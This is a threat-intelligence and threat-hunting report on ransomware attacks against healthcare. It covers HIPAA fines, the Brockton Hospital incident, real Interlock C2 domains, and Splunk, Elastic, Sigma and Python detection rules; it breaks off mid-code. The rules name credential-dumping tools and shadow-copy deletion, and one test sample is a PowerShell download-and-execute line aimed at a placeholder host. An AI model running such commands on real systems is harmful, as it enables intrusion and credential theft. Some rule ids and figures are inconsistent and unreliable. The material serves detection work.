$1.16 Million in Fines, 427,000 Patients Exposed
The Office for Civil Rights (OCR) imposed $1,165,000 in financial penalties against four healthcare organizations this month for HIPAA Security Rule violations directly tied to ransomware attacks [1]. The combined breaches exposed electronic protected health information (ePHI) of approximately 427,000 individuals [1][2]. Every organization in the enforcement actions failed to conduct accurate, timely, and thorough risk assessments, the single most common deficiency OCR flags in its investigations [2].
These four settlements bring OCR's 2026 enforcement tally to $1,278,000 in total penalties collected so far this year [1]. The fines land at a moment when healthcare ransomware attacks are accelerating: the sector saw a 36% surge in incidents during late 2025 [3], and 96% of healthcare ransomware attacks now involve data theft before encryption [22]. Organizations relying solely on backup strategies for ransomware resilience are operating on outdated assumptions.
Risk Assessment Failures: The $1.7 Million Pattern
Weak security risk analysis is the recurrent theme across HIPAA enforcement actions, and these cases are no exception [2]. OCR found that each of the four organizations either skipped risk assessments entirely, performed them superficially, or failed to remediate the vulnerabilities they identified [1][2]. Risk analysis under the HIPAA Security Rule isn't optional. It's the foundational requirement that every other administrative, physical, and technical safeguard depends on.
The math is straightforward. These organizations paid roughly $2.73 per compromised patient record in regulatory fines alone. That figure is trivial compared to the actual cost of a healthcare breach: $7.42 million on average, making healthcare the most expensive sector for data breaches [27]. The regulatory penalty is a rounding error next to the operational, legal, and reputational damage.
OCR has stated plainly that hacking and ransomware are the most frequent type of large breach reported to their office [1].
The Brockton Hospital Attack: Anatomy of Modern Healthcare Ransomware
The Anubis ransomware group's attack on Brockton Hospital (Signature Healthcare) provides a concrete example of what these threats look like in practice. The attack was detected on April 6, 2026 [11]. By April 9, Anubis claimed responsibility on its data leak site, complete with a countdown timer pressuring the hospital to pay [13].
The damage was immediate and severe. Brockton Hospital's emergency room went on divert, routing ambulances to alternate facilities [11]. The hospital announced it would continue operating under downtime procedures for two weeks [11].
Anubis representatives told SuspectFile that approximately 2TB of data was exfiltrated, including patient-related information [13]. They used double extortion: encrypting files while simultaneously threatening to publish stolen data on their leak site [13][14]. The attack follows the pattern now seen in 96% of healthcare ransomware incidents, where data theft precedes encryption [22].
The Threat Landscape: Cartels, Coalitions, and Converging Groups
Healthcare organizations aren't facing isolated criminal groups. They're dealing with an organized, increasingly consolidated ransomware ecosystem.
Anubis operates as a Ransomware-as-a-Service (RaaS) platform with a focus on double extortion tactics [14]. The Brockton Hospital attack demonstrated the group's willingness to target hospitals directly, accepting the scrutiny that comes with disrupting emergency medical services.
DragonForce formally restructured as a ransomware cartel in March 2025, forming a coalition with LockBit and Qilin to share techniques and infrastructure [11]. The group absorbed RansomHub and actively targets competitors like Mamona and BlackLock [11]. DragonForce's ransomware uses the ChaCha8 encryption algorithm and supports multiple command-line arguments for local and network encryption modes [12]. Initial access in observed cases has come through compromised remote desktop servers [12].
Interlock emerged in September 2024 and has heavily targeted the healthcare sector [9]. FBI investigations identified active command-and-control infrastructure using Cloudflare tunneling, with the group deploying custom encryptors for both Windows and Linux systems [9]. Interlock actors have been observed using Cobalt Strike and SystemBC for C2 communications [9].
Akira has claimed $244.17 million in ransom proceeds as of September 2025 [10]. The group operates under multiple aliases, including Storm-1567, Howling Scorpius, Punk Spider, and Gold Sahara [10]. Akira deploys the Megazord encryptor and Akira_v2 variants, targeting critical infrastructure broadly [10].
Qilin (also known as Agenda ransomware) focuses heavily on credential theft, including LSASS memory dumping for privilege escalation [13]. The group claimed responsibility for an attack on ApolloMD Business Services [24].
Over 7,500 organizations appeared on dark web leak sites in 2025, a 58% jump from 2024 [24].
IOC Table
| Type | Value | Context | Source |
|---|---|---|---|
| Malware | Anubis | RaaS operation, attacked Brockton Hospital | [14] |
| Malware | Interlock RAT | Custom RAT for C2 communications | [9] |
| Malware | Cobalt Strike | C2 framework used by Interlock and DragonForce actors | [9][12] |
| Malware | SystemBC | C2 application used by Interlock actors | [9] |
| Malware | Akira_v2 | Latest Akira variant with faster encryption | [10] |
| Malware | Megazord | Rust-based encryptor, uses .powerranges extension | [10] |
| Malware | DragonForce ransomware | Based on LockBit 3.0 and Conti code | [11] |
| Malware | Qilin Locker | Alternative name for Qilin/Agenda ransomware | [13] |
| Domain | existed-bunch-balance-council.trycloudflare.com | Interlock C2, Cloudflare tunneling | [9] |
| Domain | ferrari-rolling-facilities-lounge.trycloudflare.com | Interlock C2, Cloudflare tunneling | [9] |
| Domain | ranked-accordingly-ab-hired.trycloudflare.com | Interlock C2, Cloudflare tunneling | [9] |
| Filename | fn.txt | Akira ransom note filename | [10] |
| Filename | .akira | File extension, early Akira variants | [10] |
| Filename | .powerranges | File extension, Megazord encryptor | [10] |
MITRE ATT&CK Mapping
| Technique ID | Name | Relevance |
|---|---|---|
| T1190 | Exploit Public-Facing Application | Initial access vector for multiple healthcare-targeting groups [9][10] |
| T1078 | Valid Accounts | Used by Akira and Interlock for access and lateral movement [9][10] |
| T1566.001 | Spearphishing Attachment | Phishing as initial access for Interlock [9] |
| T1059.001 | PowerShell | Script execution observed across Interlock and DragonForce campaigns [9][12] |
| T1003.001 | OS Credential Dumping: LSASS Memory | Core Qilin TTP for credential theft [13] |
| T1562 | Impair Defenses | Disabling security tools prior to encryption [9][10] |
| T1074 | Data Staged | Staging exfiltration prior to encryption (double extortion) [13] |
| T1041 | Exfiltration Over C2 Channel | Data theft before ransomware deployment [9][13] |
| T1486 | Data Encrypted for Impact | Ransomware encryption payload [9][10][14] |
| T1055 | Process Injection | Defense evasion technique across multiple groups [9][13] |
| T1046 | Network Service Scanning | Internal reconnaissance post-compromise [9][13] |
Detection and Hunting Guidance
Monitor for Cloudflare tunnel abuse. Interlock's C2 infrastructure uses trycloudflare.com subdomains [9]. Hunt for DNS queries resolving to .trycloudflare.com from internal hosts that shouldn't be using Cloudflare tunnels. SIEM query example: index=dns query="*.trycloudflare.com" | stats count by src_ip. Investigate any hits from endpoints or servers that have no business reason to use Cloudflare tunnels.
Watch for LSASS access patterns. Qilin's heavy reliance on LSASS memory dumping for credential theft [13] means Sysmon Event ID 10 (ProcessAccess) targeting lsass.exe is a critical detection point. Filter for TargetImage containing lsass.exe with GrantedAccess values like 0x1010 or 0x1FFFFF.
Track large outbound data transfers. The 2TB exfiltration from Brockton Hospital [13] would have generated significant outbound traffic. Set alerting thresholds on egress volume per host, particularly for connections to cloud storage providers and unfamiliar external IPs. Any single host pushing hundreds of gigabytes outbound over hours warrants immediate investigation.
Detect Cobalt Strike and SystemBC beacons. Both are used by Interlock actors [9] and DragonForce [12]. JA3/JA3S fingerprinting, beacon interval analysis, and named pipe monitoring (\\.\pipe\msagent_) can surface these C2 frameworks.
Look for ransomware staging indicators. Files with .akira, .powerranges extensions [10], or the ransom note fn.txt [10] indicate encryption has already begun. More useful: monitor for mass file rename operations, deletion of Volume Shadow Copies (vssadmin delete shadows), and disabling of Windows Defender via PowerShell or registry modification.
Analysis
OCR's enforcement actions are calibrated to send a message, but the fines are modest relative to actual breach costs. At $7.42 million per healthcare breach on average [27], a $290,000 penalty (the rough per-organization average in this round) barely registers as a financial deterrent. The corrective action plans and monitoring periods attached to these settlements likely carry more operational weight than the dollar amounts.
The 36% surge in healthcare ransomware during late 2025 [3] coincides with organizational consolidation among threat actors. DragonForce's cartel structure with LockBit and Qilin [11] represents a maturation of the RaaS ecosystem. Shared infrastructure and techniques lower the barrier for affiliates to conduct sophisticated operations, including the kind of double extortion that hit Brockton Hospital.
Red Sheep Assessment
Confidence: Moderate-High
The convergence of several data points suggests OCR's current enforcement posture is inadequate to drive meaningful security improvement across the healthcare sector. The fines are too small, the investigations too slow, and the corrective action plans too backward-looking.
Consider the timeline: these April 2026 fines address breaches that occurred months or years ago. Meanwhile, Brockton Hospital was actively running under downtime procedures this month [11]. The regulatory cycle operates on a fundamentally different tempo than the threat actors it's meant to counter.
More concerning is what the DragonForce cartel formation signals [11]. Ransomware groups are consolidating resources and sharing infrastructure in ways that resemble legitimate business mergers. This pooling of capability, recruitment pipelines, and tooling means healthcare organizations face a more professionalized adversary than even 12 months ago. The 58% year-over-year increase in leak site victims [24] is not a statistical anomaly. It reflects increased operational capacity.
OCR's risk assessment fixation, while legally sound, also creates a compliance monoculture. Organizations optimize for passing risk assessments rather than building genuine detection and response capabilities. The four organizations fined this month all failed at risk analysis [1][2], but the real question is whether passing that assessment would have prevented the ransomware from succeeding. The answer is probably not, absent corresponding investment in detection engineering, network segmentation, and incident response.
Defender's Checklist
- [ ] Conduct or update HIPAA Security Rule risk assessment immediately. Every OCR enforcement action in this batch cited risk analysis failures [1][2]. Use NIST SP 800-30 methodology. Document findings, remediation timelines, and responsible parties. This is the bare minimum regulatory requirement.
- [ ] Deploy egress monitoring with volume-based alerting. Set thresholds for outbound data transfers exceeding baseline per host. The Brockton Hospital attack involved 2TB of exfiltration [13]. Tools like Zeek or network flow analysis can flag anomalous volumes before encryption begins.
- [ ] Hunt for Interlock C2 infrastructure in DNS logs. Query: index=dns query="*.trycloudflare.com" and correlate with endpoint telemetry [9]. Block known malicious subdomains at DNS resolver level.
- [ ] Implement LSASS protection. Enable Credential Guard on Windows 10/11 and Server 2016+ systems. Configure attack surface reduction (ASR) rules to block credential stealing from LSASS. Monitor Sysmon Event ID 10 for suspicious access to lsass.exe [13].
- [ ] Test ransomware response under realistic conditions. Tabletop exercises should include double extortion scenarios where backups are intact but 2TB of patient data is on a leak site with a countdown timer [13]. Validate that your incident response plan addresses both encryption recovery and data breach notification obligations under HIPAA.
References
- OCR Fines Four Regulated Entities for HIPAA Violations That Led to Ransomware Attacks
- Weak Risk Analysis Cost 4 Firms $1.7 Million in HIPAA Fines
- Healthcare Ransomware Attacks: OC Practices & Cybersecurity
- Brockton Hospital Ransomware Attack: Downtime Procedures to Continue for Two Weeks
- Brockton Hospital Implements Downtime Procedure After Ransomware Attack
- February 2026 Healthcare Data Breach Report
- Ransomware Statistics 2026: Attacks, Costs & Trends
- 60+ Healthcare Data Breach Statistics for 2026
- #StopRansomware: Interlock | CISA
- #StopRansomware: Akira Ransomware | CISA
- DragonForce Calls for Ransomware Cartel with LockBit and Qilin
- Detailed Analysis of DragonForce Ransomware
- Qilin/Agenda Ransomware: The Credential Stealers
- Healthcare Ransomware Attacks: OC Practices & Cybersecurity
- 2025 Healthcare Data Breach Report
- Healthcare Sector Most Targeted by Ransomware Groups as Attacks Increase 49% YOY
- Data Breach Statistics 2026: Records, Costs & Industries
---
Hunt Guide: Hunt Report: Healthcare Ransomware Cartels - Anubis, DragonForce, and Affiliated Groups
Hypothesis: If healthcare-targeting ransomware groups (Anubis, DragonForce, Interlock, Akira, Qilin) are active in our environment, we expect to observe Cloudflare tunnel abuse, LSASS credential dumping, large-scale data exfiltration (>1TB), and specific ransomware staging behaviors in Sysmon, DNS, network flow, and Windows Security logs.
Intelligence Summary: OCR imposed $1.16M in HIPAA fines against four healthcare organizations for ransomware-related breaches affecting 427,000 patients. The Anubis group's April 2026 attack on Brockton Hospital demonstrates the current double extortion model: 2TB data exfiltration followed by encryption, forcing ER diversion and two-week downtime. DragonForce's formal restructuring as a ransomware cartel with LockBit and Qilin signals increasing professionalization and resource sharing among threat actors.
Confidence: High | Priority: Critical
Scope
- Networks: All clinical networks, patient data repositories, backup systems, and domain controllers. Focus on Tier 0 assets and electronic health record (EHR) systems.
- Timeframe: Initial sweep: 30 days historical. Continuous hunting: Real-time to 7 days rolling window. Extended lookback to 90 days for Cloudflare tunnel abuse.
- Priority Systems: EHR systems, PACS/imaging systems, lab information systems, domain controllers, backup servers, internet-facing clinical applications, VPN gateways
MITRE ATT&CK Techniques
T1190 — Exploit Public-Facing Application (Initial Access) [P2]
Healthcare ransomware groups exploit vulnerable internet-facing applications including unpatched VPN appliances, RDP servers, and web applications for initial access
Splunk SPL:
index=web_logs status>=400 | stats count by src_ip, dest_port, uri_path | where count>50 | lookup threat_intel_ip src_ip OUTPUT threat_score | where threat_score>0 OR dest_port IN (3389,443,8443)
Elastic ES|QL:
FROM logs-* | WHERE event.category == "web" AND http.response.status_code >= 400 | STATS request_count = COUNT(*) BY source.ip, destination.port, url.path | WHERE request_count > 50
Sigma Rule:
```yaml
title: Suspicious Web Application Exploitation Attempts
id: a7c3d773-3a4f-4e6b-9e3c-8b4d5f7e9c2a
status: experimental
author: RedSheep Security/Stone
date: 2026/04/07
description: Detects multiple failed web requests from single source indicating scanning/exploitation
references:
  - Internal Research
logsource:
  category: webserver
detection:
  selection:
    sc-status:
      - 400
      - 401
      - 403
      - 404
      - 500
  timeframe: 5m
  condition: selection | count() by c-ip > 50
falsepositives:
  - Legitimate vulnerability scanners
  - Web crawlers
level: medium
```
Focus on internet-facing clinical applications, patient portals, and VPN gateways. Correlate with authentication logs for successful logins after scanning activity.
T1003.001 — OS Credential Dumping: LSASS Memory (Credential Access) [P1]
Qilin/Agenda ransomware heavily relies on LSASS memory dumping for credential theft and lateral movement
Splunk SPL:
index=sysmon EventCode=10 TargetImage="*\\lsass.exe" GrantedAccess IN ("0x1010","0x1410","0x1438","0x143a","0x1fffff") | eval suspicious_process=case(match(SourceImage,"(?i)(mimikatz|procdump|sqldumper)"),"Critical", match(SourceImage,"(?i)(taskmgr|werfault)"),"Medium", 1=1,"Low") | where suspicious_process!="Low" | table _time ComputerName SourceImage TargetImage GrantedAccess CallTrace
Elastic KQL:
event.code:10 AND process.name:lsass.exe AND winlog.event_data.GrantedAccess:(0x1010 OR 0x1410 OR 0x1438 OR 0x143a OR 0x1fffff) AND NOT process.parent.name:(svchost.exe OR csrss.exe OR wininit.exe)
Sigma Rule:
```yaml
title: LSASS Memory Access by Suspicious Process
id: 5ef9853e-4d0e-4a70-846f-a9ca37d876fh
status: stable
author: Florian Roth
date: 2022/03/13
modified: 2026/04/07
description: Detects process access to LSASS memory with suspicious access flags
references:
  - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
  - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml
logsource:
  category: process_access
  product: windows
detection:
  selection:
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess|startswith:
      - '0x40'
      - '0x100000'
      - '0x1410'
      - '0x1438'
      - '0x143a'
      - '0x1418'
      - '0x1f0fff'
      - '0x1f1fff'
      - '0x1f2fff'
      - '0x1f3fff'
  filter_exact:
    SourceImage:
      - 'C:\WINDOWS\system32\taskmgr.exe'
      - 'C:\Windows\System32\perfmon.exe'
  filter_generic:
    SourceImage|startswith:
      - 'C:\Program Files\'
      - 'C:\Program Files (x86)\'
    GrantedAccess: '0x1410'
  filter_defender:
    SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\'
    SourceImage|endswith: '\MsMpEng.exe'
  filter_defender_atp:
    SourceImage|endswith: '\MsSense.exe'
  condition: selection and not 1 of filter*
falsepositives:
  - Legitimate security products
level: high
```
Enable Credential Guard where possible. Monitor for process creation of known LSASS dumping tools. Alert on any non-system process accessing LSASS with these specific access rights.
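The Sysmon Event ID 10 triage described in the Detection and Hunting Guidance section and in the SPL and Sigma rule above, as an added Python example that is not part of the report: instead of matching an exact list of GrantedAccess values, it decodes the access mask into the rights that matter for credential dumping (PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_ALL_ACCESS) and then applies the same allowlists as the Sigma filter sections. The sample events, the "Acme EDR" path and the severity tiers are constructed assumptions.

```python
# Added example (not from the report): triage Sysmon Event ID 10 records that
# target lsass.exe by decoding the GrantedAccess mask bit by bit, then applying
# allowlists equivalent to the Sigma filter_* sections.
import re

# Windows process access rights (winnt.h) that matter for LSASS dumping.
PROCESS_VM_READ = 0x0010        # read LSASS memory (MiniDumpWriteDump-style dumps)
PROCESS_DUP_HANDLE = 0x0040     # duplicate an existing LSASS handle
PROCESS_ALL_ACCESS = 0x1FFFFF

# Allowlists mirroring the Sigma filters above (compared lowercased).
BENIGN_EXACT = {
    r"c:\windows\system32\taskmgr.exe",
    r"c:\windows\system32\perfmon.exe",
}
BENIGN_SUFFIX = (r"\msmpeng.exe", r"\mssense.exe")
TRUSTED_PREFIX = ("c:\\program files\\", "c:\\program files (x86)\\")
KNOWN_DUMPERS = re.compile(r"mimikatz|procdump|sqldumper|comsvcs", re.I)


def access_flags(granted):
    """Split a hex GrantedAccess string such as '0x1410' into the named rights we care about."""
    mask = int(granted, 16)
    names = []
    if mask & PROCESS_VM_READ:
        names.append("PROCESS_VM_READ")
    if mask & PROCESS_DUP_HANDLE:
        names.append("PROCESS_DUP_HANDLE")
    if mask == PROCESS_ALL_ACCESS:
        names.append("PROCESS_ALL_ACCESS")
    return names


def lsass_access_severity(event):
    """Return 'critical', 'high', 'medium' or 'benign' for one ProcessAccess event."""
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return "benign"
    src = event["SourceImage"].lower()
    # Decide on the rights present, not on an exact list of mask values, so an
    # unusual combination (e.g. 0x1010) is still caught.
    if not access_flags(event["GrantedAccess"]):
        return "benign"
    if src in BENIGN_EXACT or src.endswith(BENIGN_SUFFIX):
        return "benign"
    if KNOWN_DUMPERS.search(src):
        return "critical"
    if src.startswith(TRUSTED_PREFIX):
        return "medium"     # installed software: verify, but lower priority
    return "high"           # anything else able to read LSASS memory


ORDER = {"critical": 0, "high": 1, "medium": 2}


def hunt_lsass(events):
    """Return (severity, SourceImage, rights) for every non-benign event, worst first."""
    hits = []
    for ev in events:
        sev = lsass_access_severity(ev)
        if sev != "benign":
            hits.append((sev, ev["SourceImage"], access_flags(ev["GrantedAccess"])))
    return sorted(hits, key=lambda h: ORDER[h[0]])


# Constructed sample events (not real telemetry) using Sysmon Event ID 10 field names.
LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe", "TargetImage": LSASS, "GrantedAccess": "0x1410"},
    {"SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\procdump64.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Program Files\Acme EDR\agent.exe", "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS, "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Windows\Temp\svc.exe", "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for sev, image, rights in hunt_lsass(SAMPLE_EVENTS):
        print(f"{sev:8s} {image}  {'|'.join(rights)}")
```

The mask-bit approach is the reason 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION alone, which svchost.exe and many monitoring tools request constantly) is ignored while 0x1010 from an unknown binary is escalated.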
T1041 — Exfiltration Over C2 Channel (Exfiltration) [P1]
Ransomware groups exfiltrate large volumes of data (2TB in Brockton case) before encryption for double extortion
Splunk SPL:
index=netflow | eval total_bytes=bytes_in+bytes_out | stats sum(total_bytes) as total_transfer by src_ip, dest_ip | eval total_gb=round(total_transfer/1073741824,2) | where total_gb>100 AND NOT cidrmatch("10.0.0.0/8",dest_ip) AND NOT cidrmatch("172.16.0.0/12",dest_ip) AND NOT cidrmatch("192.168.0.0/16",dest_ip) | lookup cdn_whitelist dest_ip OUTPUT is_cdn | where isnull(is_cdn) | sort - total_gb
Elastic ES|QL:
FROM logs-* | WHERE event.category == "network_traffic" AND NOT CIDR_MATCH(destination.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16") | STATS total_bytes = SUM(network.bytes) BY source.ip, destination.ip | WHERE total_bytes > 107374182400
Sigma Rule:
```yaml
title: Massive Data Transfer to External IP
id: 8b3e7a52-5f31-4a22-9a0f-8c5d4e7c3b9e
status: experimental
author: RedSheep Security/Stone
date: 2026/04/07
description: Detects large data transfers (>100GB) to external IPs potentially indicating exfiltration
references:
  - Internal Incident Response
logsource:
  category: firewall
detection:
  selection:
    EventID: 5156
    Direction: outbound
  filter:
    DestinationIp|cidr:
      - 10.0.0.0/8
      - 172.16.0.0/12
      - 192.168.0.0/16
  timeframe: 24h
  condition: selection and not filter | sum(BytesSent) by SourceIp,DestinationIp > 107374182400
fields:
  - SourceIp
  - DestinationIp
  - BytesSent
falsepositives:
  - Legitimate backup to cloud storage
  - Large file transfers to partners
level: high
```
Set baseline thresholds per critical server. 2TB exfiltration would occur over hours/days. Monitor for sustained high-volume transfers to non-business IPs.
T1102.002 — Web Service: Bidirectional Communication (Command and Control) [P1]
Interlock uses Cloudflare tunnels (*.trycloudflare.com) for C2 infrastructure to evade network controls
Splunk SPL:
index=dns (query="*.trycloudflare.com" OR answer="*.trycloudflare.com") | rex field=query "(?<subdomain>[^.]+)\.trycloudflare\.com" | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips by subdomain | eval duration=round((last_seen-first_seen)/3600,2) | where count>10 OR duration>1
Elastic ES|QL:
FROM logs-* | WHERE dns.question.name LIKE "*.trycloudflare.com" OR dns.answers.name LIKE "*.trycloudflare.com" | STATS query_count = COUNT(*), first_seen = MIN(@timestamp), last_seen = MAX(@timestamp) BY dns.question.name, source.ip
Sigma Rule:
```yaml
title: Cloudflare Tunnel Abuse for C2
id: 3f3f3e3e-4d0e-4a70-846f-a9ca37d876fd
status: experimental
author: RedSheep Security/Stone
date: 2026/04/07
description: Detects DNS queries to trycloudflare.com subdomains potentially used for C2
references:
  - https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a
logsource:
  category: dns
detection:
  selection:
    query|contains: '.trycloudflare.com'
  filter:
    query:
      - 'www.trycloudflare.com'
      - 'blog.trycloudflare.com'
      - 'support.trycloudflare.com'
  condition: selection and not filter
falsepositives:
  - Legitimate use of Cloudflare tunnels
  - Developer testing
level: medium
```
Block .trycloudflare.com at DNS level unless explicitly authorized. These subdomains (existed-bunch-balance-council, ferrari-rolling-facilities-lounge, ranked-accordingly-ab-hired) are known Interlock C2.
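The trycloudflare.com hunt from the Detection and Hunting Guidance section and from the SPL and Sigma rule above, as an added Python example that is not part of the report: it parses DNS log lines, drops the benign labels the Sigma filter lists, aggregates per tunnel label with the same count>10 OR duration>1h threshold, and raises the severity when the label is one of the three Interlock C2 subdomains in the report's IOC table. The log line format ("timestamp src_ip qtype qname") and all sample queries are constructed assumptions.

```python
# Added example (not from the report): run the trycloudflare.com hunt over DNS
# log lines with the SPL/Sigma thresholds and filter, then mark known-IOC hits.
from collections import defaultdict
from datetime import datetime, timedelta

KNOWN_INTERLOCK_C2 = {          # labels from the report's IOC table
    "existed-bunch-balance-council",
    "ferrari-rolling-facilities-lounge",
    "ranked-accordingly-ab-hired",
}
BENIGN_LABELS = {"www", "blog", "support"}   # Sigma filter list above
SUFFIX = ".trycloudflare.com"


def parse_line(line):
    """Parse '<ISO timestamp> <src_ip> <qtype> <qname>' (constructed log format)."""
    ts, src, qtype, qname = line.split()
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), src, qtype, qname.lower().rstrip(".")


def tunnel_label(qname):
    """Return the single label in front of .trycloudflare.com, or None if not a tunnel name."""
    if not qname.endswith(SUFFIX):
        return None
    label = qname[: -len(SUFFIX)]
    return label if label and "." not in label else None


def hunt_tunnels(lines, min_count=10, min_hours=1.0):
    """Aggregate per tunnel label (count, first/last seen, sources) and return flagged findings."""
    stats = defaultdict(lambda: {"count": 0, "first": None, "last": None, "src": set()})
    for line in lines:
        ts, src, _, qname = parse_line(line)
        label = tunnel_label(qname)
        if label is None or label in BENIGN_LABELS:
            continue
        s = stats[label]
        s["count"] += 1
        s["first"] = ts if s["first"] is None or ts < s["first"] else s["first"]
        s["last"] = ts if s["last"] is None or ts > s["last"] else s["last"]
        s["src"].add(src)
    findings = []
    for label, s in stats.items():
        hours = (s["last"] - s["first"]) / timedelta(hours=1)
        ioc = label in KNOWN_INTERLOCK_C2
        # Same gate as the SPL: sustained or repeated resolution; IOC match always fires.
        if ioc or s["count"] > min_count or hours > min_hours:
            findings.append({
                "subdomain": label + SUFFIX,
                "count": s["count"],
                "duration_hours": round(hours, 2),
                "source_ips": sorted(s["src"]),
                "severity": "critical" if ioc else "medium",
            })
    return sorted(findings, key=lambda f: (f["severity"] != "critical", f["subdomain"]))


def _queries(label, src, start, n, step_minutes):
    """Construct n sample log lines for one label, step_minutes apart (constructed data)."""
    t0 = datetime.fromisoformat(start)
    return [f"{(t0 + timedelta(minutes=i * step_minutes)).strftime('%Y-%m-%dT%H:%M:%SZ')} {src} A {label}{SUFFIX}"
            for i in range(n)]


SAMPLE_LINES = (
    _queries("existed-bunch-balance-council", "10.20.5.12", "2026-04-07T09:00:00", 12, 15)  # IOC, 12 queries over 2h45m
    + _queries("dev-test-tunnel", "10.20.7.3", "2026-04-07T10:00:00", 3, 90)                # 3 queries over 3h
    + _queries("some-random-words-here", "10.20.7.4", "2026-04-07T10:00:00", 2, 5)          # 2 queries over 5 min
    + _queries("www", "10.20.7.5", "2026-04-07T10:00:00", 1, 0)                             # filtered benign label
)

if __name__ == "__main__":
    for f in hunt_tunnels(SAMPLE_LINES):
        print(f"{f['severity']:8s} {f['subdomain']:55s} n={f['count']} {f['duration_hours']}h {f['source_ips']}")
```

A quick tunnel name that is resolved only a couple of times in a few minutes stays below the gate, which is what keeps developer testing out of the queue; an unknown label that a host keeps resolving for hours is surfaced at medium for follow-up.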
T1059.001 — PowerShell (Execution) [P2]
PowerShell used by Interlock and DragonForce for payload execution, defense evasion, and system discovery
Splunk SPL:
index=windows source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104 | eval decoded_block=replace(ScriptBlockText,"\s+"," ") | rex field=decoded_block max_match=0 "(?i)(invoke-expression|iex|downloadstring|encodedcommand|bypass|hidden|noprofile|windowstyle\s+hidden|bitsadmin|certutil|mshta|regsvr32)" | where match(decoded_block,"(?i)(invoke-expression|iex|downloadstring|encodedcommand)") | eval risk_score=case(match(decoded_block,"(?i)encodedcommand"),10, match(decoded_block,"(?i)downloadstring"),8, match(decoded_block,"(?i)bypass.*hidden"),9, 1=1,5) | where risk_score>=8
Elastic KQL:
event.code:4104 AND powershell.script_block_text:(Invoke-Expression OR IEX OR DownloadString OR EncodedCommand OR "-Bypass" OR "-Hidden" OR "-NoProfile")
Sigma Rule:
```yaml
title: Suspicious PowerShell Download and Execute Pattern
id: 6b3e6e3e-4d0e-4a70-846f-a9ca37d876fg
status: experimental
author: RedSheep Security/Stone
date: 2026/04/07
description: Detects PowerShell patterns commonly used in ransomware attacks
references:
  - Internal TTP Analysis
logsource:
  product: windows
  service: powershell
  definition: Script block logging must be enabled
detection:
  selection_downloads:
    EventID: 4104
    ScriptBlockText|contains:
      - 'DownloadString'
      - 'DownloadFile'
      - 'Invoke-WebRequest'
      - 'Invoke-RestMethod'
      - 'System.Net.WebClient'
  selection_execution:
    ScriptBlockText|contains:
      - 'Invoke-Expression'
      - 'IEX'
      - '&('
      - '.('
  selection_encoding:
    ScriptBlockText|contains:
      - 'FromBase64String'
      - 'EncodedCommand'
  condition: selection_downloads and (selection_execution or selection_encoding)
falsepositives:
  - Legitimate administrative scripts
  - Software deployment tools
level: high
```
Enable PowerShell ScriptBlock logging via Group Policy. Focus on encoded commands, download cradles, and AMSI bypass attempts.
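The scoring logic of the SPL query and the condition of the Sigma rule above, as an added Python example that is not part of the report. It first decodes any -EncodedCommand payload (Base64 of UTF-16LE) and scores the visible text and the decoded text together, because a download cradle hidden inside the encoded argument is invisible to pattern matching on the raw command line. The sample command lines and the placeholder URL http://example.invalid are constructed.

```python
# Added example (not from the report): decode -EncodedCommand, then apply the
# SPL risk_score case() and the Sigma condition to the combined text.
import base64
import re

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_ARG = re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD = ("downloadstring", "downloadfile", "invoke-webrequest",
            "invoke-restmethod", "system.net.webclient")
EXECUTION = ("invoke-expression", "iex", "&(", ".(")
ENCODING = ("frombase64string", "encodedcommand")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand/-enc/-e, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def risk_score(text):
    """Port of the SPL case(): 10 encoded, 8 download cradle, 9 bypass+hidden, else 5.
    As in SPL case(), the first matching branch wins, so a script that is both a
    download cradle and bypass/hidden scores 8. Returns 0 when the SPL gate
    (iex / invoke-expression / downloadstring / encodedcommand) does not match."""
    t = text.lower()
    if not re.search(r"invoke-expression|\biex\b|downloadstring|encodedcommand", t):
        return 0
    if "encodedcommand" in t:
        return 10
    if "downloadstring" in t:
        return 8
    if re.search(r"bypass.*hidden", t):
        return 9
    return 5


def sigma_match(text):
    """Condition of the Sigma rule above: selection_downloads and (selection_execution or selection_encoding)."""
    t = text.lower()
    has = lambda terms: any(term in t for term in terms)
    return has(DOWNLOAD) and (has(EXECUTION) or has(ENCODING))


def analyze(cmdline_or_block):
    """Score the visible text plus any decoded payload."""
    decoded = decode_encoded_command(cmdline_or_block)
    combined = cmdline_or_block if decoded is None else cmdline_or_block + "\n" + decoded
    return {"decoded": decoded, "risk_score": risk_score(combined), "sigma_match": sigma_match(combined)}


def _encode(ps_text):
    """Build a constructed -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(ps_text.encode("utf-16-le")).decode("ascii")


# Constructed samples; http://example.invalid is a placeholder, not a real host.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
SAMPLES = {
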